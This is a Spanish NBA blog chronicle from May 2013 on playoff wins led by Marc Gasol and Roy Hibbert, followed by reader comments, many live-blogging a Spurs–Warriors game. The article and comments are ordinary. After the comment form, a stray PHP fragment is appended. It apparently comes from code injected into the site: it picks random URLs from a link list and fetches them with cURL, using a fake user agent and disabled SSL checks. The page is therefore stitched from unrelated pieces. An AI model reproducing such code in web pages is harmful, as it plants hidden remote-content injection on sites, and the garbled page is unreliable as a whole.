La Crónica: Torre amenaza alfil

12 de May de 2013 por TheDeerHunter

En la actual crisis existencial del center puro, anoche fueron dos hombres grandes quienes dominaron sus respectivos partidos para poner ambos a sus equipos por delante en sus eliminatorias de semifinal de conferencia.

marc ibakaPor un lado, Marc Gasol se mostró fundamental por enésima ocasión en ambos lados de la cancha sumando a su constante liderazgo y dirección desde la bombilla 16 puntos en la segunda parte y provocando un 31.1% rival por presencia defensiva, colocación, anticipación y habilidad en las ayudas. Sólo cuando Hollins se vio obligado a sentarlo en el segundo cuarto por problemas de faltas los Thunder pudieron ver la luz, con un 48,1% en tiro durante ese tramo, para remontar una desventaja de dos dígitos y ponerse por delante eventualmente. La excelencia defensiva no siempre requiere de agilidad y musculatura para salir en los highlights con tapones estratosféricos.

Pero Marc es la guinda en un excelente planteamiento del técnico de los Grizzlies. En esta ocasión Hollins optó por alternar a Prince y Tony Allen sobre Durant desde el principio, y terminó con su impresionante racha de partidos consecutivos en playoffs por encima de los 30 puntos. El alero superstar sufrió el desgaste en el último cuarto, donde tan solo anotó 2 puntos. Con un flamante 91% en tiros libres en la regular también fallaba dos decisivos para ilustrar su estado mental.

Con Durant en plan humano, estos Thunder son más que asequibles. Como decía Z-Bo después, ni siquiera se vio la mejor versión de los Grizzlies. Ni él ni Conley tuvieron una actuación brillante y aun así fue para ellos la victoria (81-87).

En Indianápolis fue Roy Hibbert quien lideró a los suyos a la victoria, en uno de los mejores partidos de Playoffs de su carrera, con su habitual impacto defensivo más un notable acierto ofensivo y desplegando su repertorio de movimientos de pívot clásico. En la noche de la vuelta de Stat a la competición, los Knicks se vieron superados por Indiana bajo tableros y tuvieron una noche aciaga de cara al aro, tanto que marcaron el quinto peor registro anotador de la franquicia en Playoffs desde que se instauró el reloj de posesión (71-82). El juego lento, trabado y enfangado beneficia a Indiana. Los Knicks tendrán que encontrar la manera de subir el ritmo y recuperar su peligrosidad desde la larga distancia si quieren tener alguna opción.

PREMIOS

hibbert knicksMVP: En estos tiempos no es habitual elegir a dos pívots como MVPs la misma noche, estando gente como Durant o Carmelo en la pomada. Marc Gasol aporta en lo que se ve y en lo que no se ve. En esta ocasión, sin embargo, nos quedaremos con el mejor partido de Hibbert que recordamos desatascando un típico partido de trinchera en playoffs como el de ayer y haciéndolo frente a otro center defensivamente de élite, como es Tyson Chandler. En días como hoy se justifica el contratazo que le firmaron los Pacers el verano pasado.

La sorpresa: No fue una noche particularmente dada a la lírica ni a la sorpresa. Nos quedamos con el momento WTF del buzzer beater que se marcó Stoudemire en el tercer cuarto. Uno de los tres únicos triples que anotó New York anoche.

La decepción: Uno de los partidos más lamentables que han jugado los Knicks en postemporada en su historia. Eso es decir mucho.

El mayor esfuerzo en vano: La versión mundana de Durant es 25 puntos, 11 rebotes, 5 asistencias y 3 robos, lo que le deja esencialmente como el mejor jugador de la jornada con independencia del resultado. Lamentablemente, todo ese despliegue está por debajo de lo que necesitan los Thunder ahora mismo de él.

Imágenes | AP Photos / Getty Images

Comenta

37 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Cómo mola el título, grande Deer.

      Citar

  2. Denise dice:
    #2

    MagicJohnson32:
    Cómo mola el título, grande Deer.

    Jajaj si, el titulo tiene bastante sentid, las torres Zach & Marc zumbandose al alfil KD que está mas solo que la una..

    Y para la otra eliminatoria que titulo ponemos..”Peones se comen a la Reina (Melo)”

      Citar

  3. rumbero dice:
    #3

    Denise:
    Y para la otra eliminatoria que titulo ponemos..”Peones se comen a la Reina (Melo)”

    Yo creo que sirve el mismo. Ayer a Hibbert sólo le falto fumarse un puraco en la pintura y tirarle el humo a la cara de Melo.

    Son un poco peñazo estos Pacers cuando se ponen a jugar a este ritmo pero que manera de cortocircuitar a los Knicks. 3-11 desde el triple..los Knicks e! Y lo del rebote es un abuso en toda regla. Muy serios los Pacers.
    En NY hay tanto para repartir que da hasta pereza ponerse a enumerar nombres, pero Chandler, quien te ha visto y quien te ve amigo

      Citar

  4. HisRoyalAirness dice:
    #4

    Me da rabia que pasen los Pacers porque creo que NY, a su nivel de RS, podría dar más guerra a Miami.

    Lo de Marc en ataque, dejando la defensa al margen, empieza a ser un escándalo; ganchos en carrera, fadeaways desde 7 metros, media vuelta en el poste a modo Dirk… Vaya repertorio. Y con un acierto bestial.

    Por cierto, mejor sexto hombre de Playoffs, muy de calle, Bayless. Tremendo

      Citar

  5. HisRoyalAirness dice:
    #5

    SMALL MARKET BIG HEART!!!!

      Citar

  6. Sancho88 dice:
    #6

    Pues yo creo que Bayless y Conley se equivocaron en el último cuarto y a punto esuvo de costarle caro a los Grizzlies. A Randolph casi no le llegaban balones, o si lo hacían, era muy lejos de canasta; pero bueno, ni siquiera con alguna pérdida tonta de Conley al final los Thunder tuvieron opciones. KD está reventado absolutamente, no hay descansos para él, Kevin Martin es horchata, no tiene sangre, y jugadores que deberían estar ahora por lo menos presentables a un partido de baloncesto de éltie, como son Jeremy Lamb y Perry Jones… pues eso, no lo están. Y no hay ninguna excusa. La temporada era larguísima, ellos eran apuestas fuertes del anterior draft y deberían estar jugando ahora. Lo de Kendrick Perkins es para llorar… qué tristeza de cacho de carne… en fin.

    Pocos apostaban por Marc Gasol como un jugador de élite. Ayer se vio cómo Oklahoma no pudo hacer nada ni para superarle en ataque ni para pararle en defensa- Es una auténtica pesadilla, y poner a Durant a defenderlo fue de chiste. Y luego, aparte, que Ibaka está negadísimo con sus tiros a media distancia, falla hasta los mates y las bandejas a medio metro… el chaval le está poniendo ganas y huevos atrás, es de los pocos que lo hace, pero se esperaba mucho mas de él. Por actitud, solo Reggie Jackson y Derek Fisher están jugando con dignidad. Ibaka lo intenta pero está negadísimo, y Durant está reventado. Los demas, una verguenza de tios

      Citar

  7. melo15 dice:
    #7

    Tienes razon en eso de los rookies Sancho. Ambos demostraron su calidad en las ligas de verano y por lo menos se merecian muchas mas oportunidades esta temporada.
    si les hubieran dao mas minutos en la RS, ahora alomejor estarian aportando, y si no que le pregunten a los Warriors que la presencia de Barnes les esta llendo de perlas.

    Yo, reconozco que no confiaba en Marc pues su temporada no me habia parecida del todo bueno, pero en estos Playoffs se esta saliendo.

      Citar

  8. Esteban dice:
    #8

    No voy a darme merito por el analisis previo de la eliminatorio de pacers y kncks, pues erqa cantado y lo fue, el juego interno de indiana y esa altura para los rebotes es la clave

    Discrepo con q ny puede dar mas guerra al heat q los pacers, por elcontrario los pacers con hibbert y west van a poner en mucisimos aprietos al debil juego interior de miami

      Citar

  9. Nacho dice:
    #9

    Se que no toca aquí, pero no lo puedo remediar: QUE PEDAZO DE TRIPLE DE SPANOULIS DESDE SU P*** CASA para romper definitivamente el partido, y qué malo es Laso dirigiendo un partido… Bufff!!!!!

      Citar

  10. Nacho dice:
    #10

    Este año he visto poca NBA, por eso comento poco, (de esa os libráis) pero lo de los ositos es brutal, si se cargan a OKC el subidón que van a tener y sabiendo a lo que juegan, no los descarto para nada. Cómo molan los equipos así, y Hollins sé que tiene tirón por aquí, pero creo que no se le reconoce por otros sitios. Yo soy verde y si se va Doc me lo llevaba corriendo…

      Citar

  11. Denise dice:
    #11

    Ya está el Popovych de los cojones con el hack a Bogut…

    Nadie aquí que me acompañe para apoyar a GSW?

      Citar

  12. Denise dice:
    #12

    Se marcha de 6 Spurs…

    Que malo es Splitter por favor, quien le ha visto y quien le ve

      Citar

  13. Denise dice:
    #13

    Que gran jugador es Harrison Barnes. El segundo mejor detras de este Draft por detrás de Lillard.

    5 arriba Spurs a 8 minutos, Salvo que GSW enloquezca el partido, veo el 3-1 para Spurs. Siempre van por delante y llevan el ritmo de partido que mas le interesan.

      Citar

  14. Denise dice:
    #14

    Para tener a Curry en una esquina inutilizado, por qué no se pone a otro?

    Vaya minutos de Jack liderando a GSW

      Citar

  15. Denise dice:
    #15

    82-80 para Spurs a 2 minutos del final

      Citar

  16. Denise dice:
    #16

    Partidazo, empate a 82, pero con lo viciados que sois, como no hay nadie mas viendolo????

      Citar

  17. Denise dice:
    #17

    Empate a 84 a falta de 30 segundos. Vaya dos canastas mas forzadas de Jack y de Thompson para empatar.
    Partidazo de infarto nos espera.

      Citar

  18. Denise dice:
    #18

    Ultima bola para Warriors para ganar el partido. Vamos GSW!!

      Citar

  19. Denise dice:
    #19

    Prorroga!! Que mala eleccion de jugada. Aclarado para Jack y se tira un tiro de 6 metros. Joder!! penetrale a Parker e intenta al menos sacar la falta. Pero no vayais a prorroga, cabrones, que tengo que trabajar mañana!!!
    En fin, vamos a la prorroga.

      Citar

  20. Denise dice:
    #20

    Pero no lo entiendo. Si a Curry le duele el tobillo, dale mas descanso, si de todas formas lleva 8 minutos sin tocar el balón.

      Citar

  21. Denise dice:
    #21

    Airball de Ginobili!! 4 arriba los Warriors a 4 minutos para el final.

      Citar

  22. Denise dice:
    #22

    Alguien sabe si Blair tiene problemas o está lesionado? No entiendo como con lo malo que es Splitter; y Bonner que solo sabe dar por culo por fuera a 7 metros, no juega más. Está Duncan muyyyy solo por dentro.

      Citar

  23. Shaggy dice:
    #23

    Barnes, esta demostrando que para ser un novato no le tiembla la mano, menudo jugador!
    Curry…. sin palabras… andando y 21 ptos

      Citar

  24. Denise dice:
    #24

    No le entra nada a los Spurs en la prorroga!! 4 minutos sin anotar, viendo el aro como el ano de una hormiga. 9 arriba los GSW a 1:45 para el final. No se les puede escapar.

      Citar

  25. Denise dice:
    #25

    Shaggy:
    Barnes, esta demostrando que para ser un novato no le tiembla la mano, menudo jugador!
    Curry…. sin palabras… andando y 21 ptos

    A Barnes habría que subirle el sueldo de manera clandestina.

      Citar

  26. Shaggy dice:
    #26

    Denise: A Barnes habría que subirle el sueldo de manera clandestina.

    Completamente de acuerdo!! Es impresionante y el chaval solo tiene 20 años!! A Steph creo que le va a pasar factura el partido, aunque andando y sin correr lleva 22 ptos… como se nota la clase

    0-7 en tiros y 0-2 en libres a 1:39 del final, San Antonio no mete ni una

      Citar

  27. Denise dice:
    #27

    Anota Green. 6 arriba GSW a 1:29 . Como dato, 64 rebotes para GSW por 50 de Spurs. Pagando muy caro el equipo de Popovych el hecho que Duncan está jugando muy solo, nadie es capaz de ayudarle por dentro. Por ejemplo David Lee ha cogido 5 rebotes en 7 minutos los mismos rebotes que Splitter + Diaw en 30 minutos

      Citar

  28. Denise dice:
    #28

    Shaggy: Completamente de acuerdo!! Es impresionante y el chaval solo tiene 20 años!! A Steph creo que le va a pasar factura el partido, aunque andando y sin correr lleva 22 ptos… como se nota la clase

    0-7 en tiros y 0-2 en libres a 1:39 del final, San Antonio no mete ni una

    Pero yo le habría dado mas descanso. En los ultimos 15 minutos habrá tirado 3 veces apenas sin crear una jugada. Ha tenido suerte de que los tiros abiertos le han entrado, porque no está para ponerse a crear y generar ventajas.

    Jarret Jack MVP!!

      Citar

  29. Denise dice:
    #29

    Ganan los Warriors 97-87. tras prorroga. 2-2 en la serie.

      Citar

  30. Shaggy dice:
    #30

    Impresionante Jack mete 6 puntos seguidos al final del 4º cuarto, Klay anota la canasta de la prorroga y GS consigue un 13-3 contra SAS. FINAL 87-97!! Y la serie queda 2-2

    Pd: el horario de los domingos es un lujazo

      Citar

  31. Denise dice:
    #31

    Partido en el que los Spurs siempre han dominado, llevaron el encuentro a su terreno y los Warriors con un Curry muy renqueante y sin capacidad para generar nada, solo tiros abiertos iban a remolque. Llega el ultimo cuarto y un majestuoso Jarret Jack y un excepcional y maduro Barnes se echan el equipo a las espaldas y llevan el partido a la prorroga. En ella, los Spurs se CAGAN y solo han sido capaces de anotar un triple por medio de Danny Green, 13-3 en la prorroga y habrá como mínimo 6 partidos.
    A los Spurs les faltó un center en condiciones y no el paquete de Splitter que acompañe a Duncan. Finalmente 65 a 51 rebotes para GSW. Y por parte de GSW, a ver si Curry mejora para el proximo partido, y Lee puede empezar a jugar algo más de 10 minutos, porque juega poco pero vaya si aporta.

      Citar

  32. Denise dice:
    #32

    Os dejo los premios para la cronica de mañana:

    MVP: Jarret Jack, Echandose en el ultimo cuarto el equipo a las espaldas. Si no me equivoco 12 puntos entre los ultimos 5 minutos del ultimo cuarto mas los 5 de la prorroga,

    Rookie: Como no, Barnes con su doble-doble 26-10. Sus % han sido malos, pero tuvo dos huevos para coger la bola en unos momentos en los que Curry cojeaba, Thompson estaba desaparecido y Jack todavía aun no había afinado la muñeca.

    Decepción: Pintura de los Spurs. Duncan ha estado muy bien defendido por Bogut y Landry. 19-15 para Timmy D pero con malos porcentajes. Pero la culpa no es suya, es de sus compañeros de pintura. Bonner contra Lakers parecía Larry Bird, pero cuando se encuentra delante a un equipo que defiende bien el perimetro, es un jugador de LEB, Diaw demasiado hace el hombre, jugador muy veterano y encima con un cuerpo raro que ni es pivot ni leches. Las hostias hay que darselas al paquete de Splitter, un jugador con tanta trayectoria, montonazos de MVP’s en Europa, titulos y llega a un equipo hecho a su medida y vaya asco de jugador tan debilucho y picha fría. Ya lo comenté el otro día, de que sirven los MVP’s en Europa cuando tios sin trayectoria como Kanter, Vucevic o Valanciunas le dan mil vueltas.

    Esfuerzo en vano: Manu Ginobili. 21 puntos y 5 triples, aunque su final de partido fue lamentable, al igual que el de todos sus compañeros. Hasta un airball en un tiro solo y abierto se marcó.

      Citar

  33. R1Molano dice:
    #33

    Una gozada y eso que hemos estado en el alambre todo el partido.

    Curry jugo infiltrado en el tobillo POR TERCERA VEZ EN LOS PO.

    Jarrett Jack es dos caras, hoy toco la buena, ya tocaba en esta serie, por cierto.

      Citar

  34. GreenPride dice:
    #34

    Día de hombres grandes y de grandes desaciertos. Los dos partidos fueron cualquier cosa menos lúcidos desde el punto de vista ofensivo en ambos conjuntos. Puestos así ganaron los dos equipos que se adaptan mejor a este ritmo lento y defensivo muy de playoffs por otra parte.
    En Memphis, con Z-Bo y Conley bastante desaparecidos en ataque fue Marc el que tomó la batuta en el segundo tiempo. Su visión de juego hace difícil ayudar sobre él y si a ello unimos que ante la inoperancia de Perkins el 4 era Durant su actuación fue aún más importante porque aparte de sus números hizo trabajar muchísimo a Durant atrás lo que se notó a la hora de atacar. Sin Durant por encima de 30 será difícil ver ganar a OKC algún partido en esta eliminatoria. Y eso que Brooks ha intentado subsanar la falta de Westbrook con un ritmo más alto, intentando contragolpear y atacar la pintura todo lo que puede. En cierto sentido no le fue mal ya que los Thunder sumaron más rebotes, puntos en la zona y puntos de contraataque pero aún así a la hora de la verdad se quedaron sin anotación y lo pagaron con la derrota. La serie desde mi punto de vista está muy favorable para Memphis y sólo unas actuaciones aún más estratosféricas de Durant podrían hacer cambiar el signo.
    En Indiana, partido aún más feo y lento con unos Pacers que desnudaron la falta de ataque de los Knicks cuando sus exteriores no ven aro. Con Felton, Kidd, Prigioni, Shumpert y JR bajo mínimos en sus tiros los Knicks sobrevivieron lo que tardó en acabarse la Melo-gasolina. Los Pacers dominaron bajo aros como siempre, esta vez incluso más empujados por una actuación de verdad sobresaliente de Hibbert que dominó las zonas por completo. Está claro que los de la Gran Manzana deben acelerar el ritmo e intentar abrir la defensa con sus triples porque jugando a media cancha y con balones interiores no tienen nada que hacer.

      Citar

  35. Ruxixón dice:
    #35

    Tyson Chandler está limitadísimo por la lesión.Probablemente siga mermado y por eso no está dando su mejor nivel.La jugada que lo retrata en un rebote ofensivo que coge Hibbert y en el cual Chandler ni salta.Por ahí se le escapa cualquier opción de victoria a los Knicks en esta serie,si no tienen más control del rebote.En el Plus comentaban que Ibaka estaba tocado de la espalda,sólo así se explica su bajón.Dudo mucho que sea cosa de presión cuando el bueno de Serge ha estado en la postemporada varias veces.

    ¿Qué harán los Thunder cuando vuelva Westbrook la temporada que viene?Porque la explosión de Reggie Jackson es para darle muchos minutos.Así no tendría sentido una renovación de Kevin Martin lo que me lleva a la oportunidad de traspasar al cacho de carne + ronda + Kevin Martin o Reggie por un pívot élite.

    Let’s Go Grizz!!

      Citar

  36. safd dice:
    #36

    NBA ?@NBA 2h
    2012-13 NBA All-Defensive First Team: @KingJames @SergeIbaka9 @TysonChandler @JoakimNoah @aa000G9 & @CP3

    NBA ?@NBA 2h
    2012-13 NBA All-Defensive Second Team: Tim Duncan, @Paul_George24, @MarcGasol, @Avery_Bradley & @mconley11.

      Citar

  37. safd dice:
    #37

    Que os parece? Un poco de tongo quizas? No puede ser que por segundo año consecutivo el DPOY este en el NBA ALL-Defensive second team…

    Tampoco entiendo por qué Ibaka esta por delante de Duncan, para mi era Conley-Allen-Lebron-Duncan-Marc el quinteto primero…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>